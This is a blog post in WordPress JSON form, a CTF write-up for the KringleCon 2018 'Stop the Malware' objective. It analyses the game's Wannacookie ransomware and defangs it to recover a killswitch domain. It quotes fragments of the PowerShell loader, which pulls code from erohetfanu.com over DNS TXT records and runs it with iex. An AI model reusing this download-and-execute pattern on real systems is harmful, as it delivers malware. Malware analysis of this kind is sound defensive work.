{"id":395,"date":"2019-01-17T07:23:25","date_gmt":"2019-01-17T07:23:25","guid":{"rendered":"https:\/\/mrjsec.co.uk\/blog\/?p=395"},"modified":"2019-01-17T07:23:32","modified_gmt":"2019-01-17T07:23:32","slug":"objective-9-3-stop-the-malware","status":"publish","type":"post","link":"https:\/\/mrjsec.co.uk\/blog\/objective-9-3-stop-the-malware\/","title":{"rendered":"
Objective 9.3: Stop the Malware<\/center>"},"content":{"rendered":"\n

In this objective, we need to stop the malware!<\/p>\n\n\n\n

\"\"<\/figure><\/div>\n\n\n\n

Once again we are given the same hint from Shinny Upatree.
\n“Sweet candy goodness – I win! Thank you so much!
\nHave you heard that Kringle Castle was hit by new ransomware called Wannacookie?
\nSeveral elves reported receiving a cookie recipe Word doc. When opened, a PowerShell screen flashed by, and their files were encrypted.
\nMany elves were affected, so Alabaster went to see if he could help out.
\nI hope Alabaster watched the PowerShell Malware talk at KringleCon before he tried analysing Wannacookie on his computer.
\nAn elf I follow online said he analysed Wannacookie and that it communicates over DNS.
\nHe also said that Wannacookie transfers files over DNS and that it looks like it grabs a public key this way.
\nAnother recent ransomware made it possible to retrieve crypto keys from memory. Hopefully the same is true for Wannacookie!
\nOf course, this all depends on how the key was encrypted and managed in memory. Proper public key encryption requires a private key to decrypt.
\nPerhaps there is a flaw in the wannacookie author’s DNS server that we can manipulate to retrieve what we need.
\nIf so, we can retrieve our keys from memory, decrypt the key, and then decrypt our ransomed files.”<\/p>\n\n\n\n

However, we get two new hints link1<\/a> and link2<\/a>.<\/p>\n\n\n\n

I was going to say this sounds very similar to this<\/a>.<\/p>\n\n\n\n

Alabaster Snowball also tells us the following.
\n“Erohetfanu.com, I wonder what that means? Unfortunately, Snort alerts show multiple domains, so blocking that one won’t be effective.
\nI remember another ransomware in recent history had a killswitch domain that, when registered, would prevent any further infections.
\nPerhaps there is a mechanism like that in this ransomware? Do some more analysis and see if you can find a fatal flaw and activate it!”<\/p>\n\n\n\n

So, I’m guessing we need to register the domain with “Ho Ho Ho Daddy”, and that’s it\u2026 I think\u2026 As this is all we get within the terminal <\/p>\n\n\n\n

\"\"<\/figure><\/div>\n\n\n\n

Also, cool domain logo!
<\/p>\n\n\n\n

\"\"<\/figure><\/div>\n\n\n\n

So, Erohetfanu.com isn’t the answer (It was worth a shot!)<\/p>\n\n\n\n

\"\"<\/figure><\/div>\n\n\n\n

We need to go back one and revisit that PowerShell script was able to get from the word file, and we need to relook at the code<\/a> again!<\/p>\n\n\n\n

\"\"<\/figure><\/div>\n\n\n\n

We have the code here, but the code seems to be short as it downloads data over DNS and runs it from memory using PowerShell. I wonder if we can get a full version of this PowerShell script?<\/p>\n\n\n\n

Now let’s look at the last part of this script “-Name “$i.$f.erohetfanu.com” -Type TXT).strings}; iex($(H2A $h | Out-string))” the very last part prints out the output of the “H2A $h” maybe we can change this, so it outputs to a file.
\nAlso, remove “iex” as explained in the last one, removing “iex” makes the script\u2026 Somewhat harmless.
\n“The Invoke-Expression cmdlet evaluates or runs a specified string as a command and returns the results of the expression or command.” (https:\/\/docs.microsoft.com\/en-us\/powershell\/module\/microsoft.powershell.utility\/invoke-expression?view=powershell-6)<\/p>\n\n\n\n

Now we should have this “-Type TXT).strings}; ($(H2A $h | Out-File \/home\/mrj\/Documents\/test.text))” (This will save to my Documents folder, change as you see fit!)<\/p>\n\n\n\n

\u2026\u2026\u2026.So we get an error! <\/p>\n\n\n\n

\"\"<\/figure><\/div>\n\n\n\n

“The term ‘Resolve-DnsName’ is not recognised” On Linux PowerShell, there is no support for “Resolve-DnsName” function yet.
\nSo. I guess it’s Back to Windows!<\/p>\n\n\n\n

\"\"<\/figure><\/div>\n\n\n\n

Moreover, now get this file.
\n<\/p>\n\n\n\n

\"\"<\/figure><\/div>\n\n\n\n

However, as you can see, it’s still not the full version of the script. We need to go deeper. Deeper!<\/p>\n\n\n\n

Looking back at the script, do you notice the long numbers? ‘77616E6E61636F6F6B69652E6D696E2E707331’ well this is Hex, let’s use this website (http:\/\/www.unit-conversion.info\/texttools\/hexadecimal\/) and see what ‘77616E6E61636F6F6B69652E6D696E2E707331’ means in text.<\/p>\n\n\n\n

\"\"<\/figure><\/div>\n\n\n\n

So ‘77616E6E61636F6F6B69652E6D696E2E707331’ = wannacookie.min.ps1, this is the mini version.<\/p>\n\n\n\n

\"\"<\/figure><\/div>\n\n\n\n

And wannacookie.ps1 = ‘77616e6e61636f6f6b69652e707331’.<\/p>\n\n\n\n

\"\"<\/figure><\/div>\n\n\n\n

So, if we change the ps1 script from ‘77616E6E61636F6F6B69652E6D696E2E707331’ to ‘77616e6e61636f6f6b69652e707331’ then it should download the script we need!<\/p>\n\n\n\n

\"\"<\/figure><\/div>\n\n\n\n

So we have the file!<\/p>\n\n\n\n

\"\"<\/figure><\/div>\n\n\n\n

We can already see that the newer file “test1.txt<\/a>” is much better.<\/p>\n\n\n\n

\"\"<\/figure><\/div>\n\n\n\n

Now we need to find the domain name that the malware is calling too. So that’s it!<\/p>\n\n\n\n

As we go further into the wannacookie PowerShell script, we can find many different Hex codes, using the same website as before this is what they mean.
\n“6B6579666F72626F746964” = Keyforbotid.
\n“6B696C6C737769746368” = Killswitch.
\n“7365727665722E637274” = Server.crt.
\n“72616e736f6d697370616964” = Ransomispaid.<\/p>\n\n\n\n

\"\"<\/figure><\/div>\n\n\n\n

Killswitch “6B696C6C737769746368” Is the one we are looking at here, even do we have the script we need\u2026 We still don’t have the domain, so let’s run the script, however, let’ edit it first to make it print out the domain name. <\/p>\n\n\n\n

\"\"<\/figure><\/div>\n\n\n\n

First let’s remove “function Enc_Dec-File($key, $File, $enc_it)” (As this is the part that will encrypt all the files\u2026 Which is not something we need! And “function enc_dec” and “-Server 8.8.8.8))) {return} if ($(netstat -ano | Select-String “127.0.0.1:8080”).length -ne 0 -or (Get-WmiObject Win32_ComputerSystem).Domain -ne “KRINGLECASTLE”) {return}” (Plus everything till the end)
\nSince we don’t need the script calling back, we want to print out the output!<\/p>\n\n\n\n

Next change “if ($null -ne ((Resolve-DnsName -Name” to “write-host” and delete this string ” .ToString() -ErrorAction 0″ Again we want the script to output the domain, not to call back or encrypt our files!<\/p>\n\n\n\n

\"\"<\/figure><\/div>\n\n\n\n

(You can view the script here<\/a>)<\/p>\n\n\n\n

Now we can run the script in windows and not worry about any issues (I still recommend it’s best to run in a VM!) <\/p>\n\n\n\n

\"\"<\/figure><\/div>\n\n\n\n

So the domain we need is “yippeekiyaa.aaay”
\n(Note: If you’re having any issues with the PowerShell scripts, using Windows 10 fixes most\/all the issues you may face.)<\/p>\n\n\n\n

Moreover, that’s another one done!<\/p>\n\n\n\n

\"\"<\/figure><\/div>\n","protected":false},"excerpt":{"rendered":"

In this objective, we need to stop the malware! Once again we are given the same hint from Shinny Upatree. “Sweet candy goodness – I win! Thank you so much! Have you heard that Kringle…<\/p>\n","protected":false},"author":1,"featured_media":0,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"jetpack_post_was_ever_published":false,"_jetpack_newsletter_access":"","_jetpack_dont_email_post_to_subs":false,"_jetpack_newsletter_tier_id":0,"_jetpack_memberships_contains_paywalled_content":false,"_jetpack_memberships_contains_paid_content":false,"footnotes":"","jetpack_publicize_message":"","jetpack_publicize_feature_enabled":true,"jetpack_social_post_already_shared":false,"jetpack_social_options":{"image_generator_settings":{"template":"highway","default_image_id":0,"font":"","enabled":false},"version":2}},"categories":[10],"tags":[13,14,12],"class_list":["post-395","post","type-post","status-publish","format-standard","hentry","category-kringlecon-2018","tag-13","tag-ctf","tag-kringlecon"],"jetpack_publicize_connections":[],"jetpack_featured_media_url":"","jetpack_sharing_enabled":true,"jetpack_shortlink":"https:\/\/wp.me\/paD3U6-6n","_links":{"self":[{"href":"https:\/\/mrjsec.co.uk\/blog\/wp-json\/wp\/v2\/posts\/395","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/mrjsec.co.uk\/blog\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/mrjsec.co.uk\/blog\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/mrjsec.co.uk\/blog\/wp-json\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/mrjsec.co.uk\/blog\/wp-json\/wp\/v2\/comments?post=395"}],"version-history":[{"count":1,"href":"https:\/\/mrjsec.co.uk\/blog\/wp-json\/wp\/v2\/posts\/395\/revisions"}],"predecessor-version":[{"id":414,"href":"https:\/\/mrjsec.co.uk\/blog\/wp-json\/wp\/v2\/posts\/395\/revisions\/414"}],"wp:attachment":[{"href":"https:\/\/mrjsec.co.uk\/blog\/wp-json\/wp\/v2\/media?parent=395"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/mrjsec.co.uk\/blog\/wp-json\/wp\/v2\/categories?post=395"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/mrjsec.co.uk\/blog\/wp-json\/wp\/v2\/tags?post=395"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}